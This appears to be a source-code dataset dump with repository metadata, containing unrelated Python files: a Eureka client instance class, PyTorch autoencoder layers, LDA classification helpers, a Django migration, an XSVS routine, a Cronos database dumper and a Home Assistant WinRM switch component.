return None
def set_status_without_dirty(self, status: Status):
"""
Set the status for this instance without updating the dirty timestamp.
Args:
status: status to be set for this instance.
"""
if self._status != status:
self._status = status
def set_overridden_status(self, status: Status):
"""
Set the overridden status for this instance. Normally set by an external
process to disable instance from taking traffic.
Args:
status: overridden status to be for this instance.
"""
if self._overridden_status != status:
self._overridden_status = status
def register_runtime_metadata(self, metadata: Dict[str, str]):
"""
Register application specific metadata to be sent to the eureka
server.
Args:
metadata: Dictionary containing key/value pairs.
"""
self._metadata.update(metadata)
self.set_is_dirty()
| 33.368421 | 140 | 0.670647 | # -*- coding: utf-8 -*-
# standard library
from enum import Enum
from typing import Dict, Optional
# scip plugin
from eureka.client.app_info.lease_info import LeaseInfo
from eureka.utils.timestamp import current_timestamp
__author__ = "Haribo (haribo1558599@gmail.com)"
__license__ = "Apache 2.0"
class InstanceInfo:
"""
The class that holds information required for registration with
Eureka Server and to be discovered by other components.
See com.netflix.appinfo.InstanceInfo.
"""
__slots__ = (
"_instance_id",
"_app_name",
"_app_group_name",
"_ip_address",
"_vip_address",
"_secure_vip_address",
"_lease_info",
"_metadata",
"_last_updated_timestamp",
"_last_dirty_timestamp",
"_action_type",
"_host_name",
"_is_coordinating_discovery_server",
"_is_secure_port_enabled",
"_is_unsecure_port_enabled",
"_port",
"_secure_port",
"_status",
"_overridden_status",
"_is_instance_info_dirty",
)
DEFAULT_PORT = 7001
DEFAULT_SECURE_PORT = 7002
class PortType(Enum):
SECURE = "SECURE"
UNSECURE = "UNSECURE"
class Status(Enum):
# Ready to receive traffic.
UP = "UP"
# Do not send traffic (Healthcheck callback failed).
DOWN = "DOWN"
# Do not send traffic (Just about starting and initializations are to be done).
STARTING = "STARTING"
# Intentionally shutdown for traffic.
OUT_OF_SERVICE = "OUT_OF_SERVICE"
UNKNOWN = "UNKNOWN"
class ActionType(Enum):
"""
Eureka server will set the action type on the instance to let
Eureka client know what action to perform on this instance in
its local registry.
"""
ADD = "ADD"
MODIFIED = "MODIFIED"
DELETED = "DELETED"
def __init__(
self,
instance_id: str,
app_name: str,
ip_address: str,
vip_address: str,
secure_vip_address: str,
lease_info: LeaseInfo,
host_name: str,
app_group_name: str = None,
metadata: Dict[str, str] = None,
last_updated_timestamp: int = None,
last_dirty_timestamp: int = None,
action_type: ActionType = None,
is_coordinating_discovery_server: bool = False,
is_secure_port_enabled: bool = False,
is_unsecure_port_enabled: bool = True,
port: int = DEFAULT_PORT,
secure_port: int = DEFAULT_SECURE_PORT,
status: Status = Status.UP,
overridden_status: Status = Status.UNKNOWN,
is_instance_info_dirty: bool = False,
):
"""
Args:
instance_id: the unique id of the instance.
app_name: the application name of the instance.This is mostly used in querying of instances.
ip_address: the ip address, in AWS scenario it is a private IP.
vip_address: the Virtual Internet Protocol address for this instance. Defaults to hostname if not specified.
secure_vip_address: the Secure Virtual Internet Protocol address for this instance. Defaults to hostname if not specified.
lease_info: the lease information regarding when it expires.
host_name: the default network address to connect to this instance. Typically this would be the fully qualified public hostname.
metadata: all application specific metadata set on the instance.
last_updated_timestamp: last time when the instance was updated.
last_dirty_timestamp: the last time when this instance was touched.
port: the unsecure port number that is used for servicing requests.
secure_port: the secure port that is used for servicing requests.
status: the status indicating whether the instance can handle requests.
overridden_status:the status indicating whether an external process has changed the status.
"""
self._instance_id = instance_id
self._app_name = app_name
self._app_group_name = app_group_name
self._ip_address = ip_address
self._vip_address = vip_address
self._secure_vip_address = secure_vip_address
self._lease_info = lease_info
self._metadata = metadata
self._last_updated_timestamp = last_updated_timestamp
self._last_dirty_timestamp = last_dirty_timestamp
self._action_type = action_type
self._host_name = host_name
self._is_coordinating_discovery_server = is_coordinating_discovery_server
self._is_secure_port_enabled = is_secure_port_enabled
self._is_unsecure_port_enabled = is_unsecure_port_enabled
self._port = port
self._secure_port = secure_port
self._status = status
self._overridden_status = overridden_status
self._is_instance_info_dirty = is_instance_info_dirty
@property
def instance_id(self) -> str:
return self._instance_id
@instance_id.setter
def instance_id(self, instance_id: str):
self._instance_id = instance_id
@property
def app_name(self) -> str:
return self._app_name
@app_name.setter
def app_name(self, app_name: str):
self._app_name = app_name
@property
def app_group_name(self) -> str:
return self._app_group_name
@app_group_name.setter
def app_group_name(self, app_group_name: str):
self._app_group_name = app_group_name
@property
def ip_address(self) -> str:
return self._ip_address
@ip_address.setter
def ip_address(self, ip_address: str):
self._ip_address = ip_address
@property
def vip_address(self) -> str:
return self._vip_address
@vip_address.setter
def vip_address(self, vip_address: str):
self._vip_address = vip_address
@property
def secure_vip_address(self) -> str:
return self._secure_vip_address
@secure_vip_address.setter
def secure_vip_address(self, secure_vip_address: str):
self._secure_vip_address = secure_vip_address
@property
def lease_info(self) -> LeaseInfo:
return self._lease_info
@lease_info.setter
def lease_info(self, lease_info: LeaseInfo):
self._lease_info = lease_info
@property
def metadata(self) -> Dict[str, str]:
return self._metadata
@metadata.setter
def metadata(self, metadata: Dict[str, str]):
self._metadata = metadata
@property
def last_updated_timestamp(self) -> int:
return self._last_updated_timestamp
@last_updated_timestamp.setter
def last_updated_timestamp(self, last_updated_timestamp: int):
self._last_updated_timestamp = last_updated_timestamp
@property
def last_dirty_timestamp(self) -> int:
return self._last_dirty_timestamp
@last_dirty_timestamp.setter
def last_dirty_timestamp(self, last_dirty_timestamp: int):
self._last_dirty_timestamp = last_dirty_timestamp
@property
def port(self) -> int:
return self._port
@port.setter
def port(self, port: int):
self._port = port
@property
def secure_port(self) -> int:
return self._secure_port
@secure_port.setter
def secure_port(self, secure_port: int):
self._secure_port = secure_port
@property
def action_type(self) -> ActionType:
return self._action_type
@action_type.setter
def action_type(self, action_type: ActionType):
self._action_type = action_type
@property
def host_name(self) -> str:
return self._host_name
@host_name.setter
def host_name(self, host_name: str):
self._host_name = host_name
@property
def is_secure_port_enabled(self) -> bool:
return self._is_secure_port_enabled
@is_secure_port_enabled.setter
def is_secure_port_enabled(self, is_secure_port_enabled: bool):
self._is_secure_port_enabled = is_secure_port_enabled
@property
def is_unsecure_port_enabled(self) -> bool:
return self._is_unsecure_port_enabled
@is_unsecure_port_enabled.setter
def is_unsecure_port_enabled(self, is_unsecure_port_enabled: bool):
self._is_unsecure_port_enabled = is_unsecure_port_enabled
@property
def status(self) -> Status:
return self._status
@status.setter
def status(self, status: Status):
self._status = status
@property
def overridden_status(self) -> Status:
return self._overridden_status
@overridden_status.setter
def overridden_status(self, overridden_status: Status):
self._overridden_status = overridden_status
@property
def is_instance_info_dirty(self) -> bool:
return self._is_instance_info_dirty
@is_instance_info_dirty.setter
def is_instance_info_dirty(self, is_instance_info_dirty: bool):
self._is_instance_info_dirty = is_instance_info_dirty
@property
def is_coordinating_discovery_server(self) -> bool:
return self._is_coordinating_discovery_server
@is_coordinating_discovery_server.setter
def is_coordinating_discovery_server(self, is_coordinating_discovery_server: bool):
self._is_coordinating_discovery_server = is_coordinating_discovery_server
def is_port_enabled(self, port_type: PortType) -> bool:
"""
Checks whether a port is enabled for traffic or not.
Args:
port_type: indicates whether it is secure or unsecure port.
Returns: true if the port is enabled, false otherwise.
"""
return {
InstanceInfo.PortType.UNSECURE: self._is_unsecure_port_enabled,
InstanceInfo.PortType.SECURE: self._is_secure_port_enabled,
}.get(port_type, False)
def is_dirty(self) -> bool:
"""
Return whether any state changed so that EurekaClient can
check whether to retransmit info or not on the next heartbeat.
Returns: true if the instance is dirty, false otherwise.
"""
return self._is_instance_info_dirty
def is_dirty_with_time(self) -> Optional[int]:
return self._last_dirty_timestamp if self._is_instance_info_dirty else None
def set_is_dirty(self):
"""
Set the dirty flag so that the instance information can be carried to
the eureka server on the next heartbeat.
"""
self._is_instance_info_dirty = True
self._last_dirty_timestamp = current_timestamp()
def set_is_dirty_with_time(self) -> int:
"""
Set the dirty flag, and also return the timestamp of the is_dirty event.
Returns: the timestamp when the isDirty flag is set.
"""
self.set_is_dirty()
return self._last_dirty_timestamp
def unset_is_dirty(self, unset_dirty_timestamp: int):
"""
Unset the dirty flag iff the unset_dirty_timestamp matches the last_dirty_timestamp. No-op if
last_dirty_timestamp > unset_dirty_timestamp
Args:
unset_dirty_timestamp: the expected last_dirty_timestamp to unset.
"""
if self._last_dirty_timestamp <= unset_dirty_timestamp:
self._is_instance_info_dirty = False
def set_last_updated_timestamp(self):
self._last_updated_timestamp = current_timestamp()
def set_is_coordinating_discovery_server(self):
"""
Set the flag if this instance is the same as the eureka discovery server that is
return the instances. This flag is used by the discovery clients to
identify the discovery server which is coordinating/returning the
information.
"""
self._is_coordinating_discovery_server = True
def set_status(self, status: Status) -> Optional[Status]:
"""
Set the status for this instance.
Args:
status: status to be set for this instance.
Returns: the previous status if a different status from the current was set, none otherwise.
"""
if self._status != status:
previous_status = self._status
self._status = status
self.set_is_dirty()
return previous_status
return None
def set_status_without_dirty(self, status: Status):
"""
Set the status for this instance without updating the dirty timestamp.
Args:
status: status to be set for this instance.
"""
if self._status != status:
self._status = status
def set_overridden_status(self, status: Status):
"""
Set the overridden status for this instance. Normally set by an external
process to disable instance from taking traffic.
Args:
status: overridden status to be for this instance.
"""
if self._overridden_status != status:
self._overridden_status = status
def register_runtime_metadata(self, metadata: Dict[str, str]):
"""
Register application specific metadata to be sent to the eureka
server.
Args:
metadata: Dictionary containing key/value pairs.
"""
self._metadata.update(metadata)
self.set_is_dirty()
| 2,672 | 426 | 1,148 |
d2d90ca6f48ea2a81de8048d173854525c05722d | 10,723 | py | Python | iin/models/ae.py | KongBOy/analyze_16_code_iin | b1bcf6055f95680fa101f8f3e34766801f506289 | [
"MIT"
] | 94 | 2020-04-02T18:10:27.000Z | 2022-03-16T08:36:37.000Z | iin/models/ae.py | KongBOy/analyze_16_code_iin | b1bcf6055f95680fa101f8f3e34766801f506289 | [
"MIT"
] | 6 | 2020-06-23T03:29:20.000Z | 2021-04-22T07:44:07.000Z | iin/models/ae.py | CompVis/iin | fa0d2d1cfa6fc0b813b902cd3474145a045fbb34 | [
"MIT"
] | 15 | 2020-04-29T02:49:36.000Z | 2022-02-22T04:32:06.000Z | import functools
import torch.nn as nn
import torch
import numpy as np
from edflow.util import retrieve
_norm_options = {
"in": nn.InstanceNorm2d,
"bn": nn.BatchNorm2d,
"an": ActNorm}
| 31.538235 | 87 | 0.546396 | import functools
import torch.nn as nn
import torch
import numpy as np
from edflow.util import retrieve
class ActNorm(nn.Module):
def __init__(self, num_features, affine=True, logdet=False):
super().__init__()
assert affine
self.logdet = logdet
self.loc = nn.Parameter(torch.zeros(1, num_features, 1, 1))
self.scale = nn.Parameter(torch.ones(1, num_features, 1, 1))
self.register_buffer('initialized', torch.tensor(0, dtype=torch.uint8))
def initialize(self, input):
with torch.no_grad():
flatten = input.permute(1, 0, 2, 3).contiguous().view(input.shape[1], -1)
mean = (
flatten.mean(1)
.unsqueeze(1)
.unsqueeze(2)
.unsqueeze(3)
.permute(1, 0, 2, 3)
)
std = (
flatten.std(1)
.unsqueeze(1)
.unsqueeze(2)
.unsqueeze(3)
.permute(1, 0, 2, 3)
)
self.loc.data.copy_(-mean)
self.scale.data.copy_(1 / (std + 1e-6))
def forward(self, input, reverse=False):
if reverse:
return self.reverse(input)
_, _, height, width = input.shape
if self.initialized.item() == 0:
self.initialize(input)
self.initialized.fill_(1)
h = self.scale * (input + self.loc)
if self.logdet:
log_abs = torch.log(torch.abs(self.scale))
logdet = height*width*torch.sum(log_abs)
logdet = logdet * torch.ones(input.shape[0]).to(input)
return h, logdet
return h
def reverse(self, output):
return output / self.scale - self.loc
_norm_options = {
"in": nn.InstanceNorm2d,
"bn": nn.BatchNorm2d,
"an": ActNorm}
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
nn.init.normal_(m.weight.data, 0.0, 0.02)
elif classname.find('BatchNorm') != -1:
nn.init.normal_(m.weight.data, 1.0, 0.02)
nn.init.constant_(m.bias.data, 0)
class FeatureLayer(nn.Module):
def __init__(self, scale, in_channels=None, norm='IN'):
super().__init__()
self.scale = scale
self.norm = _norm_options[norm.lower()]
if in_channels is None:
self.in_channels = 64*min(2**(self.scale-1), 16)
else:
self.in_channels = in_channels
self.build()
def forward(self, input):
x = input
for layer in self.sub_layers:
x = layer(x)
return x
def build(self):
Norm = functools.partial(self.norm, affine=True)
Activate = lambda: nn.LeakyReLU(0.2)
self.sub_layers = nn.ModuleList([
nn.Conv2d(
in_channels=self.in_channels,
out_channels=64*min(2**self.scale, 16),
kernel_size=4,
stride=2,
padding=1,
bias=False),
Norm(num_features=64*min(2**self.scale, 16)),
Activate()])
class LatentLayer(nn.Module):
def __init__(self, in_channels, out_channels):
super(LatentLayer, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.build()
def forward(self, input):
x = input
for layer in self.sub_layers:
x = layer(x)
return x
def build(self):
self.sub_layers = nn.ModuleList([
nn.Conv2d(
in_channels=self.in_channels,
out_channels=self.out_channels,
kernel_size=1,
stride=1,
padding=0,
bias=True)
])
class DecoderLayer(nn.Module):
def __init__(self, scale, in_channels=None, norm='IN'):
super().__init__()
self.scale = scale
self.norm = _norm_options[norm.lower()]
if in_channels is not None:
self.in_channels = in_channels
else:
self.in_channels = 64*min(2**(self.scale+1), 16)
self.build()
def forward(self, input):
d = input
for layer in self.sub_layers:
d = layer(d)
return d
def build(self):
Norm = functools.partial(self.norm, affine=True)
Activate = lambda: nn.LeakyReLU(0.2)
self.sub_layers = nn.ModuleList([
nn.ConvTranspose2d(
in_channels=self.in_channels,
out_channels=64*min(2**self.scale, 16),
kernel_size=4,
stride=2,
padding=1,
bias=False),
Norm(num_features=64*min(2**self.scale, 16)),
Activate()])
class DenseEncoderLayer(nn.Module):
def __init__(self, scale, spatial_size, out_size, in_channels=None):
super().__init__()
self.scale = scale
self.in_channels = 64*min(2**(self.scale-1), 16)
if in_channels is not None:
self.in_channels = in_channels
self.out_channels = out_size
self.kernel_size = spatial_size
self.build()
def forward(self, input):
x = input
for layer in self.sub_layers:
x = layer(x)
return x
def build(self):
self.sub_layers = nn.ModuleList([
nn.Conv2d(
in_channels=self.in_channels,
out_channels=self.out_channels,
kernel_size=self.kernel_size,
stride=1,
padding=0,
bias=True)])
class DenseDecoderLayer(nn.Module):
def __init__(self, scale, spatial_size, in_size):
super().__init__()
self.scale = scale
self.in_channels = in_size
self.out_channels = 64*min(2**self.scale, 16)
self.kernel_size = spatial_size
self.build()
def forward(self, input):
x = input
for layer in self.sub_layers:
x = layer(x)
return x
def build(self):
self.sub_layers = nn.ModuleList([
nn.ConvTranspose2d(
in_channels=self.in_channels,
out_channels=self.out_channels,
kernel_size=self.kernel_size,
stride=1,
padding=0,
bias=True)])
class ImageLayer(nn.Module):
def __init__(self, out_channels=3, in_channels=64):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.build()
def forward(self, input):
x = input
for layer in self.sub_layers:
x = layer(x)
return x
def build(self):
FinalActivate = lambda: torch.nn.Tanh()
self.sub_layers = nn.ModuleList([
nn.ConvTranspose2d(
in_channels=self.in_channels,
out_channels=self.out_channels,
kernel_size=4,
stride=2,
padding=1,
bias=False),
FinalActivate()
])
class Distribution(object):
def __init__(self, parameters, deterministic=False):
self.parameters = parameters
self.mean, self.logvar = torch.chunk(parameters, 2, dim=1)
self.logvar = torch.clamp(self.logvar, -30.0, 10.0)
self.deterministic = deterministic
self.std = torch.exp(0.5*self.logvar)
self.var = torch.exp(self.logvar)
if self.deterministic:
self.var = self.std = torch.zeros_like(self.mean).to(
torch.device('cuda' if torch.cuda.is_available() else 'cpu'))
def sample(self):
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
x = self.mean + self.std*torch.randn(self.mean.shape).to(device)
return x
def kl(self, other=None):
if self.deterministic:
return torch.Tensor([0.])
else:
if other is None:
return 0.5*torch.sum(torch.pow(self.mean, 2)
+ self.var - 1.0 - self.logvar,
dim=[1,2,3])
else:
return 0.5*torch.sum(
torch.pow(self.mean - other.mean, 2) / other.var
+ self.var / other.var - 1.0 - self.logvar + other.logvar,
dim=[1,2,3])
def nll(self, sample):
if self.deterministic:
return torch.Tensor([0.])
logtwopi = np.log(2.0*np.pi)
return 0.5*torch.sum(
logtwopi+self.logvar+torch.pow(sample-self.mean, 2) / self.var,
dim=[1,2,3])
def mode(self):
return self.mean
class Model(nn.Module):
def __init__(self, config):
super().__init__()
import torch.backends.cudnn as cudnn
cudnn.benchmark = True
n_down = retrieve(config, "Model/n_down")
z_dim = retrieve(config, "Model/z_dim")
in_size = retrieve(config, "Model/in_size")
bottleneck_size = in_size // 2**n_down
in_channels = retrieve(config, "Model/in_channels")
norm = retrieve(config, "Model/norm")
self.be_deterministic = retrieve(config, "Model/deterministic")
self.feature_layers = nn.ModuleList()
self.decoder_layers = nn.ModuleList()
self.feature_layers.append(FeatureLayer(0, in_channels=in_channels, norm=norm))
for scale in range(1, n_down):
self.feature_layers.append(FeatureLayer(scale, norm=norm))
self.dense_encode = DenseEncoderLayer(n_down, bottleneck_size, 2*z_dim)
self.dense_decode = DenseDecoderLayer(n_down-1, bottleneck_size, z_dim)
for scale in range(n_down-1):
self.decoder_layers.append(DecoderLayer(scale, norm=norm))
self.image_layer = ImageLayer(out_channels=in_channels)
self.apply(weights_init)
self.n_down = n_down
self.z_dim = z_dim
self.bottleneck_size = bottleneck_size
def encode(self, input):
h = input
for layer in self.feature_layers:
h = layer(h)
h = self.dense_encode(h)
return Distribution(h, deterministic=self.be_deterministic)
def decode(self, input):
h = input
h = self.dense_decode(h)
for layer in reversed(self.decoder_layers):
h = layer(h)
h = self.image_layer(h)
return h
def get_last_layer(self):
return self.image_layer.sub_layers[0].weight
| 9,372 | 73 | 1,058 |
e777dcf999b9a0f5498859b46c06e05526549659 | 3,120 | py | Python | src/python/utils/classification_list.py | Lamzigit/manifold_learning | f699fe4f25dbabdbc2dc9635c4e654b59806e17d | [
"MIT"
] | 10 | 2017-06-14T08:04:44.000Z | 2021-07-06T07:13:16.000Z | src/python/utils/classification_list.py | Lamzigit/manifold_learning | f699fe4f25dbabdbc2dc9635c4e654b59806e17d | [
"MIT"
] | 1 | 2020-11-18T13:08:43.000Z | 2020-11-18T13:12:39.000Z | src/python/utils/classification_list.py | Lamzigit/manifold_learning | f699fe4f25dbabdbc2dc9635c4e654b59806e17d | [
"MIT"
] | 3 | 2017-06-14T08:04:53.000Z | 2019-11-18T13:21:15.000Z | # -*- coding: utf-8 -*-
"""
Created on Sun May 1 15:02:38 2016
@author: eman
"""
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from sklearn.metrics import accuracy_score, precision_score, f1_score, \
fbeta_score, recall_score
from skll.metrics import kappa
import numpy as np
import pandas as pd
# this is my classification experiment function which basically delegates
# which classification method I want to use on the data.
# my simple naive LDA function to classify my data. Since I have
# multiple datasets, I loop through each dataset in my list and
# and perform classificaiton on that
#---------
# LDA Prediction
#---------------
def lda_pred(Xtrain, Xtest, Ytrain, Ytest):
""" Simple Naive Implementation of the the LDA
"""
# empty list for the predictions
Ypred = []
# loop through and perform classification
for xtrain, xtest, ytrain, ytest in zip(Xtrain,Xtest,
Ytrain, Ytest):
# initialize the model
lda_model = LDA()
# fit the model to the training data
lda_model.fit(xtrain, ytrain.ravel())
# save the results of the model predicting the testing data
Ypred.append(lda_model.predict(xtest))
# return this list
return Ypred
# the same function as before except with list comprehension
# (trying to practice that pythonic-ism a bit)
| 28.363636 | 75 | 0.594231 | # -*- coding: utf-8 -*-
"""
Created on Sun May 1 15:02:38 2016
@author: eman
"""
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from sklearn.metrics import accuracy_score, precision_score, f1_score, \
fbeta_score, recall_score
from skll.metrics import kappa
import numpy as np
import pandas as pd
# this is my classification experiment function which basically delegates
# which classification method I want to use on the data.
def classification_exp(Xtrain, Xtest, Ytrain, Ytest, model='LDA'):
if model in ['LDA', 'lda']:
return lda_pred(Xtrain, Xtest, Ytrain, Ytest)
else:
raise ValueError('Sorry, the {m} model not available for' \
'classification. Please use LDA for the time'\
'being.'.format(m=model))
# my simple naive LDA function to classify my data. Since I have
# multiple datasets, I loop through each dataset in my list and
# and perform classificaiton on that
#---------
# LDA Prediction
#---------------
def lda_pred(Xtrain, Xtest, Ytrain, Ytest):
""" Simple Naive Implementation of the the LDA
"""
# empty list for the predictions
Ypred = []
# loop through and perform classification
for xtrain, xtest, ytrain, ytest in zip(Xtrain,Xtest,
Ytrain, Ytest):
# initialize the model
lda_model = LDA()
# fit the model to the training data
lda_model.fit(xtrain, ytrain.ravel())
# save the results of the model predicting the testing data
Ypred.append(lda_model.predict(xtest))
# return this list
return Ypred
def accuracy_stats(Ypred, Ytest):
stats = {}
statkeys = ['AA', 'AP', 'f1', 'recall', 'kappa']
for key in statkeys:
stats[key] = []
for ypred, ytest in zip(Ypred, Ytest):
stats['AA'].append(accuracy_score(ytest.ravel(), ypred.ravel()))
stats['AP'].append(precision_score(ytest.ravel(), ypred.ravel()))
stats['f1'].append(f1_score(ytest.ravel(), ypred.ravel()))
stats['recall'].append(recall_score(ytest.ravel(), ypred.ravel()))
stats['kappa'].append(kappa(ytest.ravel(), ypred.ravel()))
return stats
# the same function as before except with list comprehension
# (trying to practice that pythonic-ism a bit)
def accuracy_statsv2(Ypred, Ytest):
stats = {}
statkeys = ['AA', 'AP', 'f1', 'recall', 'kappa']
for key in statkeys:
stats[key] = []
stats['AA'] = [accuracy_score(ytest.ravel(), ypred.ravel()) for \
ypred, ytest in zip(Ypred, Ytest)]
def exp_runs(trials = 2):
stats = [None]*trials
Ystats = {'AA':None, 'AP':None}
for key in Ystats:
Ystats[key] = stats
trial_num = 0
while trial_num < trials:
Ystats['AA'][trial_num], Ystats['AP'][trial_num] = run_exp()
trial_num += 1
return results_avg(Ystats)
| 1,489 | 0 | 90 |
b945e4d3a48a918b26d0622ca61368e2cce8cb43 | 394 | py | Python | story/migrations/0008_alter_story_user_input.py | sachink2010/DjangoTrial | 8b78a31409b614959ed45380f2b8ee9f03fa9f90 | [
"MIT"
] | null | null | null | story/migrations/0008_alter_story_user_input.py | sachink2010/DjangoTrial | 8b78a31409b614959ed45380f2b8ee9f03fa9f90 | [
"MIT"
] | null | null | null | story/migrations/0008_alter_story_user_input.py | sachink2010/DjangoTrial | 8b78a31409b614959ed45380f2b8ee9f03fa9f90 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.7 on 2021-10-31 22:24
from django.db import migrations, models
| 20.736842 | 51 | 0.606599 | # Generated by Django 3.2.7 on 2021-10-31 22:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('story', '0007_alter_story_api_response'),
]
operations = [
migrations.AlterField(
model_name='story',
name='user_input',
field=models.CharField(max_length=400),
),
]
| 0 | 280 | 23 |
2d11f9cd5efb4254316d37a90c446e6431852a6d | 799 | py | Python | Xana/XsvsAna/mp_prob.py | reiserm/Xana | 056f2bf2da67ba0dade49bb4b56ea2afd42b36bd | [
"MIT"
] | 1 | 2021-01-25T08:57:57.000Z | 2021-01-25T08:57:57.000Z | Xana/XsvsAna/mp_prob.py | reiserm/Xana | 056f2bf2da67ba0dade49bb4b56ea2afd42b36bd | [
"MIT"
] | 21 | 2020-03-23T12:50:32.000Z | 2021-05-07T07:54:38.000Z | Xana/XsvsAna/mp_prob.py | reiserm/Xana | 056f2bf2da67ba0dade49bb4b56ea2afd42b36bd | [
"MIT"
] | 2 | 2020-03-22T10:31:09.000Z | 2020-07-01T14:00:28.000Z | import numpy as np
from time import time
| 25.774194 | 88 | 0.519399 | import numpy as np
from time import time
def mp_prob(method, nbins, nf, lind, nq, quc, quce):
def xsvs_full(chunk):
for qi in xnq:
roi = chunk[qi]
for i, line in enumerate(roi):
tmp = np.append(
np.sum(line), np.histogram(line, bins=np.arange(nbins + 1) - 0.5)[0]
)
prob[qi, :, t0 + i] = tmp / lind[qi]
tcalc = time()
xnq = range(nq)
prob = np.zeros((nq, nbins + 1, nf), dtype=np.float32)
t0 = 0
while t0 < nf:
chunk = quc.get()
chunk_size = chunk[0].shape[0]
xsvs_full(chunk)
t0 += chunk_size
# END OF MAIN LOOP put results to output queue
quc.close()
quc.join_thread()
tcalc = time() - tcalc
quce.put([prob, tcalc])
| 734 | 0 | 23 |
f888e997ec9f6e4baa38e1930f54f6a97bbdc19b | 1,509 | py | Python | crodump/dumpdbfields.py | nlitsme/cronodump | 9a394938645368529847bc96bb5ee33ea9f91a99 | [
"MIT"
] | null | null | null | crodump/dumpdbfields.py | nlitsme/cronodump | 9a394938645368529847bc96bb5ee33ea9f91a99 | [
"MIT"
] | null | null | null | crodump/dumpdbfields.py | nlitsme/cronodump | 9a394938645368529847bc96bb5ee33ea9f91a99 | [
"MIT"
] | null | null | null | """
`dumpdbfields` demonstrates how to enumerate tables and records.
"""
import os
import os.path
from Database import Database
if __name__ == "__main__":
main()
| 30.18 | 77 | 0.5222 | """
`dumpdbfields` demonstrates how to enumerate tables and records.
"""
import os
import os.path
from Database import Database
def main():
import sys
if len(sys.argv) == 1:
print("Usage: python3 dumpdbfields.py <path> [reclimit:100]")
print("""
For each Cronos database found under <path>, will output the first `reclimit`
records of each table found in those databases""")
return
dbpath = sys.argv[1]
reclimit = int(sys.argv[2], 0) if len(sys.argv)==3 else 100
# construct a dummy args object.
class Cls: pass
args = Cls()
args.verbose = False
# recurse all subdirectories
for path, _, files in os.walk(dbpath):
# check if there is a crostru file in this directory.
if any(_ for _ in files if _.lower() == "crostru.dat"):
print("==>", path, "<==")
try:
db = Database(path)
for tab in db.enumerate_tables():
tab.dump(args)
print("nr of records: %d" % db.nrofrecords())
i = 0
for rec in db.enumerate_records(tab):
for field, fielddef in zip(rec.fields, tab.fields):
print(">> %s -- %s" % (fielddef, field.content))
i += 1
if i > reclimit:
break
except Exception as e:
print("ERROR: %s" % e)
if __name__ == "__main__":
main()
| 1,317 | 0 | 23 |
e1ec15ebb78c0b7e5402babd3c405d177d91284d | 6,892 | py | Python | custom_components/ha_pywinrm/switch.py | k3wio/ha_pywinrm | e63d0203507a4c1830eb0f99c8b6f7daa0a8bfb5 | [
"MIT"
] | null | null | null | custom_components/ha_pywinrm/switch.py | k3wio/ha_pywinrm | e63d0203507a4c1830eb0f99c8b6f7daa0a8bfb5 | [
"MIT"
] | null | null | null | custom_components/ha_pywinrm/switch.py | k3wio/ha_pywinrm | e63d0203507a4c1830eb0f99c8b6f7daa0a8bfb5 | [
"MIT"
] | null | null | null | """Support for winrm commands to turn a switch on/off."""
import logging
import winrm
import voluptuous as vol
from homeassistant.components.switch import (
ENTITY_ID_FORMAT,
PLATFORM_SCHEMA,
SwitchDevice,
)
from homeassistant.const import (
CONF_COMMAND_OFF,
CONF_COMMAND_ON,
CONF_COMMAND_STATE,
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_FRIENDLY_NAME,
CONF_SWITCHES,
CONF_USERNAME,
CONF_VALUE_TEMPLATE,
)
from .const import DOMAIN
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
SWITCH_SCHEMA = vol.Schema(
{
vol.Optional(CONF_COMMAND_OFF, default="true"): cv.string,
vol.Optional(CONF_COMMAND_ON, default="true"): cv.string,
vol.Optional(CONF_COMMAND_STATE): cv.string,
vol.Optional(CONF_FRIENDLY_NAME): cv.string,
vol.Optional(CONF_HOST): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_VALUE_TEMPLATE): cv.template,
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_SWITCHES): cv.schema_with_slug_keys(SWITCH_SCHEMA)}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Find and return switches controlled by shell commands."""
devices = config.get(CONF_SWITCHES, {})
switches = []
for object_id, device_config in devices.items():
value_template = device_config.get(CONF_VALUE_TEMPLATE)
if value_template is not None:
value_template.hass = hass
switches.append(
CommandSwitch(
hass,
object_id,
device_config.get(CONF_FRIENDLY_NAME, object_id),
device_config.get(CONF_COMMAND_ON),
device_config.get(CONF_COMMAND_OFF),
device_config.get(CONF_COMMAND_STATE),
device_config.get(CONF_HOST),
device_config.get(CONF_PASSWORD),
device_config.get(CONF_USERNAME),
value_template,
)
)
if not switches:
_LOGGER.error("No switches added")
return False
add_entities(switches)
class CommandSwitch(SwitchDevice):
"""Representation a switch that can be toggled using shell commands."""
def __init__(
self,
hass,
object_id,
friendly_name,
command_on,
command_off,
command_state,
host,
password,
username,
value_template,
):
"""Initialize the switch."""
self._hass = hass
self.entity_id = ENTITY_ID_FORMAT.format(object_id)
self._name = friendly_name
self._state = False
self._command_on = command_on
self._command_off = command_off
self._command_state = command_state
self._host = host
self._password = password
self._username = username
self._value_template = value_template
@staticmethod
def _switch(command, host, password, username):
"""Execute the actual commands."""
_LOGGER.info("Running command: %s on host: %s" % (command, host))
try:
session = winrm.Session(host, auth=(username, password))
response_object = session.run_ps(command)
success = response_object.status_code == 0
except Exception as e:
_LOGGER.error("Command failed: %s on host: %s. %s" % (command, host, e))
_LOGGER.error(" %s" % (e))
if not success:
_LOGGER.error("Command failed: %s on host: %s" % (command, host))
return success
@staticmethod
def _query_state_value(command, host, password, username):
"""Execute state command for return value."""
_LOGGER.info("Running state command: %s on host: %s" % (command, host))
try:
session = winrm.Session(host, auth=(username, password))
response_object = session.run_ps(command)
std_out = response_object.std_out.strip().decode("utf-8")
std_err = response_object.std_err.strip().decode("utf-8")
status_code = response_object.status_code
return std_out
except Exception as e:
_LOGGER.error("State command failed: %s on host: %s. %s" % (command, host, e))
@staticmethod
def _query_state_code(command, host, password, username):
"""Execute state command for return code."""
_LOGGER.info("Running state command: %s on host: %s" % (command, host))
try:
